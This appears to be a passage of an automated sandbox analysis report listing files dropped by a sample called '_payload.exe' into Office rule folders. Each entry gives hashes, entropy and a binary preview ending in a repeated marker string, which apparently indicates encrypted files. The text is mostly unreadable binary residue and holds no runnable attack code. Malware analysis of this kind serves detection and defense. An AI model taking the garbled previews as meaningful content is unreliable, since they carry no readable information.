                                                                                                                                                                      Preview:<?xml..h...Vu..L0....u..t....M...Lh....>[.Tv.D.6Oz..B~.'..bV.Z.i.^..(.5>ZH....oQ.........l0..k...zD....~k..@..F.%|... .f...W.b....=.H.'..dMS..(a.`.Dj.%..k.....2..BAm..H..M.....R.|oP.C..5e3.S...af+;M........./.A3..l.......w...K..E{.z..H..<%v.U#q..b.......&:.....F....C.q.J...e.w.QW.5.H.a.i$.....*.i$...V...|.....#}.k..:.H}........9.N..|.WJ.._.[..........'I2..d..>.H.rf.@.A^.+.)...:&.......y.z.%/$..~...%..gi..TX:H.@.......f...e..hr.{vY..R(...E@.Q~%.......#.)i...q3......+g{sh[...u.mD~..#=.u7..p..I....$>..o^.qJ.|W..v..R....+.x.|.U..]o..0..5DAX.r...^.k.^..f..\/).~.z,~ 7.NA.w...%b...vEA,...s..&Z ..%+....Q..vS....4.zP........Td...8...b.gmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120610v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):807
                                                                                                                                                                      Entropy (8bit):7.761820193011199
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:MY8bfIu2npDnT7UOrPiO6yoTkwAKkVcqL2bD:MRbfIDnpbT7PP7oBPD
                                                                                                                                                                      MD5:216907153E1E1B2D6B10EF5D0C1854F0
                                                                                                                                                                      SHA1:A9C17E88BA526237EA2865B61DD781DCDED6A39F
                                                                                                                                                                      SHA-256:ECBD9E3DFFD652F7F441E7F4723FB3BEFE1C7FBEC272CA3D4E44E4BA4488409E
                                                                                                                                                                      SHA-512:66899D61BA22DBC31C5F2E0B0922E95F014E5C73FE1B77654798D8AA34FC107210B927E5D034651B284F316ABF061FA8D81620B11346AE0346A45D97D5AAE67C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.a4.o..}g.:A"..l..B....".... ...5..L@.Av).4>.Y.q. g*...z.ar"..x3.-.Z.`8.p.P......g....~tt..g.B...q>.8s3.:...W.e... .?F..F.......A.+.^..i..@.d.......ML.sKZ..8g...{...'.`]..sBA.y.G.P.w-)....E.kI.....R....Hs....^.........cK.$..~..N.1.)....j..u._[.\.OjC...V<g..z.W..p!eK.n...p........:R;.D.E.gSL.x( .....V........?...pZ...`.M.8..K.+rq...[.....Z;]P.^*I..[b.a...g+....h4r..E.t.@-..~.........Bs....!...i....=............!..Ned.f......15.T.Sd..(..z...\=..RP.o2....m...a.&...Q...U#.:..pUA7..x.....Q(.L.n0"5K^0...L|.J.#B|k_.M.a.bRh,.o6.l...G..0..I'qX.}.%8.!.$. .....Q....ZJ~...m.]A-.';..J.K...Q.[.[/.P.C)G.UD.*........-....~.......9V....L......J..qp.5..q;.!$....?Y6|I..#1.......v....T.a....f......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120611v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):748
                                                                                                                                                                      Entropy (8bit):7.651111731639149
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:ssPzlVGDPXvaWidmoeIAhEBUl5LtJHCJmej3FRBUiHBgGSKIyG7D23VSUdNcii9a:ssPBAD3aW0mqAS+3HCJpj1RBUuS2IFGX
                                                                                                                                                                      MD5:B5DEE24CB8A3C55BCE483F463AB59A8D
                                                                                                                                                                      SHA1:5970D67EE227B0E745154ABBD110550D4BB698CE
                                                                                                                                                                      SHA-256:47FCE2F12C0576A79181179421D3F3B9EC3B61BEF42AA95C93EDD2FFD365AA0F
                                                                                                                                                                      SHA-512:467FBC9114AB824D87FDBB8A1F97FE7F2D3619789335A8564F3C892906F1A29CC55504372231C69C3DE503D1145C92F8246C38B18F27BCFEAD3E645733172C0D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.9.Q4o.3.....#TXf.}....&Qo.S..i.mak4Ok..*.$..R.#.l.rL'"p...z7x..t.?R.u6.5..UfgQ..kB..%...y.b..R...EF.B.l.....p.X....ixJ.....s...QJ..hz.T.B.[..h+ ..o.?....h8..~..he)H.H..!#.s.......5.7...TA....v.H=_.p!....a.6P...>.H..2sXR..3...b.....1..I.d .....1........QO..y...Wj....t.$1....wu...[..'1...Tu5.....1.....NkL..hQN.......{.Z.:20..H.....B.<.\.. ...2...q.).M..N.Ey..3..5..p<.|...G.s..t..Y...c.P.....k.5......a.i.T.5!......*...`.<.Sdh.J.=.Z..83-..'...$9y..&.f......^.M...C.....b7qcP.s..qw../..B8.XZ.F..[..l.Zz..?n.g.G.oP......'.+...J......jc@.K..4..hm.!f!.l7.....Y.E...:....APH.d.&...=........:..J.#....C.....Z)..@[....o....4.Y._QG.. ...$..gmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120612v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):804
                                                                                                                                                                      Entropy (8bit):7.745066022299954
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cLWmPUvtIJzuZZC7gubtMmKfCaV98NbOlGLb2bD:w5PUVUuZZCsuhrEqbOlPD
                                                                                                                                                                      MD5:89E44C8714D13099C43B4C0D2E2E2379
                                                                                                                                                                      SHA1:2A4DEDFA1D14C08B7E7C7A6899F01B2FBACA1667
                                                                                                                                                                      SHA-256:E8A1CB5D583C0AB71C1E064F5C974AA96298EB7171891F735418500FC72A534A
                                                                                                                                                                      SHA-512:ADF20DFF357AAFCB087382EA5C98571DBC1F7B4BEC57BA8DFC3642A720E16C6E47B9DC065E6CC0327A3F3457D9B50F854697ACD3ED1407B66040A54629FE059D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...f.>...nMP........u...oBp.~...v..(.R...n!.l.d).T3....(Iu-aD..J.9...D.... .0.v.P9.n..c.^x.w.d.P......7.J...[K...U...KpB...b..as.y...]..W.`3kt. .:.6.;IT.......^.F.'..Z.f_...........a<hG....=l..G....N}P.F.0...pe.....N..l..U\^.7..:..~.V..]Yi3..T.|...c._ .z1..Y...U@%.....v...,W.t<..J...=.....-....g...#a..8.~S..o........Q~.!"...$. ...MB.a....?.3.f.I.m}.....[...h&.$..P......ZG...1.T........3N.M.A.R}'..g.5..;......6.C{.Z.b.8..20.)......zW...FTQ...v....[...*....vRSq.d(.<z....&A,G.7............ql.....L9...`.rn....Zt...K.P......?...7_.*3}...g..._....D.9...7.....*...z@.6.Q..>X.I.6.9H)Q...Z.....>c<..`V........k~..Hu.6.UfV.0..@..~1".w..g....q.AV.........s<0..z.k.T...K.=.7.-/%}n.....=..3..8.omMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120613v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                      Entropy (8bit):7.74237611149638
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TWa49WSjpm+kXTVshFsoTbD/DKIp61957C2HRwi2ywU4QlV2bD:JS1m3XTVshDedbxw6wD
                                                                                                                                                                      MD5:64C32744D96FF7901865A7DFF124A220
                                                                                                                                                                      SHA1:049BE5C6CC50796D0679D29D0573E200B9D2F2DE
                                                                                                                                                                      SHA-256:DE9E3B0C4557C2050442F19BC9D0F3839E1774DEDC6D3756C97822B7A4109B07
                                                                                                                                                                      SHA-512:AFE149AA864BE2D147446DCE4B0A83530F37D4E36B3C0FBC29348D795039586521444E95EC7C67D622F80F82C3EDA366BA935EC260A807D6920C24310DA7F1A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.uu..........B%W.j.]8eSX..s.O..U.}wT.9az...c`.d.....X{.|{,...[..s.........P.twt..Z>*.E.fJe..-...k./..B.;.Vdfo..5Pg.......ffQ.........;.....1...Y.y_.../G.....H...pk........6.e...C.4.y.....K"#Uv...'&...*.4.EL.+. .Q..YX.....&i..~..W....=..<.7...V.f5.w9O..=b.......%..x..8..i..n\&q...'nJ."`......|%...A......q......R.....;.."j.vZ...bl.."@......d+.A......{y.......c.....-....O...k[.+e+.l.f9.....+M81.._.........vM....9...]...3...]..\..`#..Z......X....RG.....82.....WU.Z&.:.z#,..3...Kl:......V=s.L..U:.B,:*.D....}..|.9....s[.@7..A61.z.l'.x.gW.l.-#[.(-..91..d<%#.v%G...p...2.-y6...A....Y...s:Z...S.P/..[.\..-m}F.......!9a.lWQ..0>...}...l....G.......5..v...*.n...c...y.hm..o..Uu.EPyiBP*.Y.z...WO.cU..c..+J...==.....".:Y.........D...[..p@.....O...gk...E...I.k..~...m.......=>..5q}]......F....}.%.8.Q`.....M.7(.MV..X.v....<.....=......\....u.R.U3....T V$zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120614v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):800
                                                                                                                                                                      Entropy (8bit):7.686442408550305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:r7S4k/YKa4rs8jdcGho2Ibw4eY1tKbv092bD:nShQt18xc32IleEIvPD
                                                                                                                                                                      MD5:4C08988073300B1BE28841123B01A484
                                                                                                                                                                      SHA1:771D2768921C8575FFE608314E3AF7CF8BBEFB35
                                                                                                                                                                      SHA-256:66B34224244F35D4CEDE74528A56F09F928E4A207E38805033716939B25684B0
                                                                                                                                                                      SHA-512:F5155A91B0AAC43D320F1EE14CB3CF703B422D5B5829536EE9F879A96EA1BA4CE6456CA779C61252F80F0FDCF5E86AD0F8C2117D6EE03DD5B01272C2957EE6AB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.,....H..[........ .dM}.;!.\G.&KXp..hN.<B..45.......,......E.c..d.....<B5..`.o....I"t....HM.t.{.....R...E=.(y5....0.........(_...2....%..k..'i.%.<.X..G.Z...y..8...&/SKxfv..".%....RR..V4....$4/+. .".)...QS....$...h.:..1Su..A...wx.I.....|+.Gw...K...n.....ON..{.<...|..1,....jl._,..fyh...@.Q.t.y.o3.?.1....WRn.k. ..:k...w./)3./:..R.v....L.9f'W.4T.A.L`.U.....@5...'.'...x.e.h..l......_..._..jW...y'/^..z.s..f...0...|X...d......{Vk4....@.......y.....U...>cN....w{nY;..4o.....jjJ...H^u...I.....e...."..0....U...AaJ.....o......LO..2m..I...a.ov&.jm!(...?Q.s...Wo....X..q .kt.x..w.y.fu.Eapr.3V,5....?...w... .a.vW...sI:W...x`o...{.......q.$..|"F....{9.VZP.....:.t.q,.tf..).V.X.-mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120615v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):740
                                                                                                                                                                      Entropy (8bit):7.679774989184889
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:eW3091X2MWthdHiwJnHALOLXWAWMiXcXECd/pUYQcwDWSUdNcii9a:ePMtjiynHALOLXWAZiXcvccQV2bD
                                                                                                                                                                      MD5:B94D68A8D7E9EB52C52F8D35D15B80CA
                                                                                                                                                                      SHA1:19B7202AB7AFEFBA34FC1D1372B5790E5F895FA8
                                                                                                                                                                      SHA-256:AD7E0772BEAD10DE8899E88762CBDAE161F87F6B4641B486EBA9B8FB7967011A
                                                                                                                                                                      SHA-512:25F880D446F9E1B586367B809508E794C634B179A9DF8E8CC5E3BBC45F22381731603F7B6C14A3BB88C6CF2C1B74A10BDB4FCAB26903EFB368179E9875617557
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml(...v.>.2(;.D.I.L.1.1.(....... .j.zM.nE.x..8...d..ph.4.....#p)..E..~...z....W...{...E......<q.!.G4)'!?.i_a.."z/.d.i....@.9B.+=.i.$.HB..>.ZZ....1N.8.4.....s..[.1..gSvl.]j=^;Y...U!.y..^/..............HB.e..&5...8>..c...........KW..c..........u&.p.....IS.._v...T.....H.)....k.x[.}..G.6-.3..o......F....X....-g..<.4.+....^..pa...X..%*N...UN|...].>.k^I1t.7&..k.../...Y..`.$..'....N...-S....H.f$.q....qsXf...*.o.K5...5......CE.]...f..`.4.,...@...g.........C.+...G~d.....j&.....#zm.J.....8m...O.]...J A.../......<..@..!q..T...^a,..E.s%1t...v$.m.a....6....I.&.P:.c.{...TY.z..%o.N..D"...r.&..........3.v...H..).U.^....a.O.S.....zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120616v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                      Entropy (8bit):7.71512265611976
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:VGDmc8Z9/nJaTXIUh+0itux0duSoRCXV8qM2bD:VI8vRaTXd4dukNQUmkD
                                                                                                                                                                      MD5:A9180652B02F3255A3D0A3E721B1AD24
                                                                                                                                                                      SHA1:2085A6BCA74B9A2605E7D0AE5E0063558817B2A7
                                                                                                                                                                      SHA-256:9F8FB4EDB175241C1A333D4D80DC3E34CE54A3A22F5BF149956F485508723B56
                                                                                                                                                                      SHA-512:48FB6BE28B308CAC8A67FA0186ECD414270570E7A1772AB3BBC87568DC9A8EAC2ECE35F6C7F3BC39338041B8BC1D5D2FA39D5B73B818D7345BDBE1835310EE98
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........l.vGw........oSK..Tu|.'TZ.P..T.L."p.'M.r..q.cf.........-l.l+...jM\...7Hwi.C......_...xG7m..:<.+..>5e'E.....Rf`.~46...t.m.D[..0.BwT.FX.?..&S.+RU...9)..M.O.....t..V.....3.4./1*'8..3..cU.=P{..........<../...<.P.5...x...j...>x.s.q ...7.5.".1...$2.B.ZE.=.n..:[.W.F.q=i.|4.L.V`....6..(d%X%.NM..sj...[.I...X..|.%.....M..[.I.<...... .aK.......9p:R..T.Hq.E..g.gX..p.l..........d.N$...#......O~..@..f...i.m..dB.U@m.sJj|..;........:..)g*.K....U...-.<..[F1...\..\....X .#x...K..#..Wr.na+....}.....(..;T..7.~S.!........2IO.....G.,...'..Yx...dC.%...o.Nr.....TE...=/i<...YJ.FW...P...F....oJ.4{..}H.s.T,`..%@Z.......8q.~.c..C.0..|2,@.s.L......</.F..+v.@...G...J1Y<....E`.G.;E..e4.~YGV$.O.[.P#t.....&....SmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120617v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                      Entropy (8bit):7.713354598797282
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qqy/VDhjp58nIbp422kSEOAxn4u1WuMnjqH+r4uZCimL90ko9XSTF5X/sGvjs4wg:6VDhr8n4MtCJW7jqerHC1JhokxlXoITL
                                                                                                                                                                      MD5:40A2AEA200C519076CE222146CBF9BB7
                                                                                                                                                                      SHA1:D4543E44B0A3DD1BD72CADFAA5E5FF3C4AF05E38
                                                                                                                                                                      SHA-256:74DBC35C5A9B23152AC1354F1077F9FDEAF2C5DF87ECAE47860E5E2E093416DE
                                                                                                                                                                      SHA-512:6EE9643D06E48A947C082D4D7C070F90CF0EBBC1783A9A7BD4E1184883A31CE43EED4673D88D0D6AC6169D669F3E4FB081EAF81FF7B3621607D19AA988AFA3E4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmls .B7.Y..nh..7..h.HTt....;..r=h:..-....^Z..W.<}[...k.o..o.`s.P...1o..P................c~..[%.\...^]U.Rm-.....;.......k.4.,.....t..~..7.h.(..........*.<!4."=Q.!....3....2c..&.s..E,V.....6(..K..K.qG6o...h.w/#..6...2.;?}*.........'...."*..Z:....l{.*Z..P,...;..A|&....-..KP.pd.v;..%....x.F..'Q.yZJ.b.U.I.,z.x...7l.......\.rg...m...v..b..r.y.....>...p.......=..:...........5.oDt...8...vOY...1.g..;...;2....}<.K....v.H.N.....[.nTb...e.....G...!N-...._..Z!.`..}^2.&...L.q....1C.y.\..x.x....J..<..q..'..fs....F...0.....B.{4...#3...P.H........h....5.S..qm.'R9..=.F....$.........M...(e...c.UG..=...3.]...R...$.J.*.A4...FR..v.wgX2~...F..6o.#....-Z).o...OX.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120618v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                      Entropy (8bit):7.734829429416061
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wwtZlsuGf93OCnpr1dO3wOyyxJ9jlmin00k92bD:wwtZlPUNprGHywpmiSWD
                                                                                                                                                                      MD5:52FF32FE48951C6A4DE1B23D41AE380C
                                                                                                                                                                      SHA1:2D210DA31E7562AA6B7E095E10E26BFD045F03BA
                                                                                                                                                                      SHA-256:BEDD5D955D8F6B0A5FC7357FE34373ACB7B467300257C445768BEBBCFBEA68EC
                                                                                                                                                                      SHA-512:CFA87F853B50894F942FD6266D7B4F13427E3368DDD509EFD9B7F113D38C972A1DC77FD14B0325F73D46395BA14901B0A276A7766DBF123BE53166D262FA26AC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml 5~....)..@N....b....... '.%Y.......O`'.D.7..........E^.Y..$B..`_R.R.F].#u.fC.V...,.cve6..T._................E.........Fi....I.N.h=.K\.....C.G.ZB...3......CS..@R\8...Y......?.|.*)...........B?.s.!.d._..Q....+q....)......F.E?..W..1.. ....D+.?!SJS....*@+.p........".=.1Cof"...@....W.Q..5.7.......SK.h..[.+...O...i....,cg..(.1.F.l.b....K..........T.MU.z|...~Z4DJ.;......7..koQ.].h.JK..#.o.s."s........e.1..a....,.(6.S....!F%..S.x......,f.@#.#m.W.,....@/.3O...<_v..>.{|.=.9g"b......s..P....x..N.'.;.3....P.rry.......d7i.b.&.S....![Q.,I..........6..............[....#....F....6.o.+t....#..C o..f.e.Y.ik.{..5.G..hS.........v$L..%.[.YJs.....z#..K)...z....{.......d>Q/....1..ry.\...rx.K.R-.].&.\..e.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120619v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):740
                                                                                                                                                                      Entropy (8bit):7.673808054294407
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:WXb1l0vEIV9m9sccJcPYfacXg324Ocr3MaCSUdNcii9a:WXBl8EIVeAicQ33DR2bD
                                                                                                                                                                      MD5:75F5DBAE2F8662C161755EDB3A9AC77A
                                                                                                                                                                      SHA1:5B1FC78BFBF6987F554775E9F683795284736694
                                                                                                                                                                      SHA-256:DD600760ED51840BBAECDE3C6C6A11098F180B5D65EAC2D65F4953421FDAF427
                                                                                                                                                                      SHA-512:B22B8B3CA960D6A2F6DE1C22CA65D7DC54787C1CA8459E9E5657B9918AA6EFD5A760CDEF7F0828F5679501299B6357C1759808FFBB6E5CD3F164FF78749C025B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml@......c...(..U1....v.q.Uy... .8.-t.M..D@m.+..]....K%.n.g........@.{..... .s.6\4_.......L.O..vLP.\P.......=x.F..cxi...pZ.r./.....s_..sj.g.`| ..nE. D.(..*s...FV<.u.l.$).p..z.J...........9a]....5A.|.nf...yr^.nu.~..p6a.L..A.[si.B..'..E....m........3.G.b.-..QZ.r....J....n......+MQ67.w.$<.%.b.6M...gP..(. ....}..O...1....L.....od^.y?+d...........y...B..Z...2...=....."..#..I.6D'....-(.ZPy.....bn..f..-.Me.(.V..>..:...QX .68K1Y..m...&.......]....[..~.U..$.......aN.k.Pa....x..}@..([.y....$..$_..q...3.b........nA].5P5e&.L6.=.T...afOM.c^.t....4..iht6D...:.#Z...N)..W%..d.r(&R..('.[\...%.R,g..M.....bf.:.C..R..2c[...B^L........1.f..mmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120620v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):802
                                                                                                                                                                      Entropy (8bit):7.722669065147857
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:faV8ZDXILoPJzTT4V9zUS5M5v8nANj1w+yTsCKyR+5+2bD:faVIXI0FT4VCL5v6AfEgnyRUD
                                                                                                                                                                      MD5:01396D93E894351E5037AB38DB7F7E1A
                                                                                                                                                                      SHA1:75120024644CC40D82F907635249C52EFEE8E60C
                                                                                                                                                                      SHA-256:746DCC6BBD0B53538F0196351BBC8CC6522B8DADD95B4A0BD78F4122B08DEBE0
                                                                                                                                                                      SHA-512:5B8DC96775BF13015F791CD14E06F1BB5AC5792D455C0164483CF0E09204180DAAAE637D531FF432C9161043862CC702EDAA3709411365511042F4269523CB93
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml'.%..A...}{....>.x.2...w..2.....[..'J.1..q+.3..... '..1....^H...S.f1.8L.......C......./6.%.2('..........y.6L...7.c.>&g.R.._...2..!.%q8..@Kt.....m......h.....E....OE@n....[.z.f......,G.u.. ....A!....=i...`..v....LH.p.9/.w.5.{..~k..|..+..C'b...i.n..'].Q...8.9...#5.FI...m...4......|\qr)8.,.....:.".Va..N.U..~.....8........M;K.2.A}..+?.5.Q...U...%..%./<i..@.}K...K.q@......~..:..69.1..Li.Zo'...4..2m..Ms&..g....<.>..\.szX..T}.!*h.7.l.D.O......';s.x........8.j.;...S.c8...+.hv..u..v..J.0%.R..N..`...6S.lm..{....i.p..v.DC@....|..66Y8.+.k......H..[....R...C........=!6.1........Q..K.c..l .A^....r.O...DgL.....rN...s.h.*...'$uim1....5....X..C.)3....s#...A.$..v.....9|...`*...6....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120621v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):748
                                                                                                                                                                      Entropy (8bit):7.754451198153962
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Bne7TxEJo9nbvZlnoHoQQF4pc6FfF+wQRfcHYmd4tTSIqBSUdNcii9a:BnyqgznpTF4ZHp41SS2bD
                                                                                                                                                                      MD5:49842D2E5F28BED295479322BCCD69B2
                                                                                                                                                                      SHA1:9D05BA93F5464859C5AA6FA57F8B31823D21A0E7
                                                                                                                                                                      SHA-256:260CB6CD0ACCC96E81329CEC640DE32F7399B989E38757D7495FAF7C90E28081
                                                                                                                                                                      SHA-512:10A4A24415B39A17D6C4324458E1E6829E6870229BDD3BD7AA012759F5A0009FABD0A1AA65EC8FA95FAACEE058D742073ADDEFA2B742E108445C57696307DACD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.}..ub...6(.@.T`....u.5..X..a<...*.I.....Hf?.;%i...Bl.9..47..f(.x...f........c.+... 1.Q.....).......hG.....>W...z..O.N....]Y.J(<..P..+.....>mq.S..N....0...9..d E^z,...)-'D.*."..G...Q.{Gay....t...+<L.]%L.....KUiL..@.......1.p.N.cf...2'.t/.;.I....[.....].z..{i......b...,...c.....L.......u.J~.P.b.X.z2,3IDk..f2"...$.P.bA_'Wh.pRcr..$..."...;<_%.."x..lq.......k......s8...x.+yhh....B......zD._..e....@9...........H...E`P...rt..^.d&!.F.Q....e........C... .t......!.....O......qA......k8?|o.d..}..7....W..^..B.]...#.....h.b....&Y..].K.....f*N...}h..2X.S^.^..V\0:..I..$h........s..L[....N..:\..DKH.<.........^.7........f...5^H....KmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120622v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):810
                                                                                                                                                                      Entropy (8bit):7.735865490921529
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:JYdohRmismR+0/sD7ipFjcs5Y+ltXmgZ9bCucT2bD:F1s8+0/Yigs+utWO4sD
                                                                                                                                                                      MD5:346D69C62A22C3F68194BAFD3EB62253
                                                                                                                                                                      SHA1:858FC21AAF453CECDA0C43C572AEC4A7121ED814
                                                                                                                                                                      SHA-256:4B75117B130DF05BB61FF8159CA01CB33578862F12C5C5F37CE03794E408E0F9
                                                                                                                                                                      SHA-512:5EAD97F76AE8694A5782B52C6020C0D0DABF1237BA00ADE96087ED66E1C83AC8C41F65FE5FC9171273DBA4E03D7B7D1D1B9FCDD0996C138F0857E4D5F4BF0C60
                                                                                                                                                                      Malicious:false
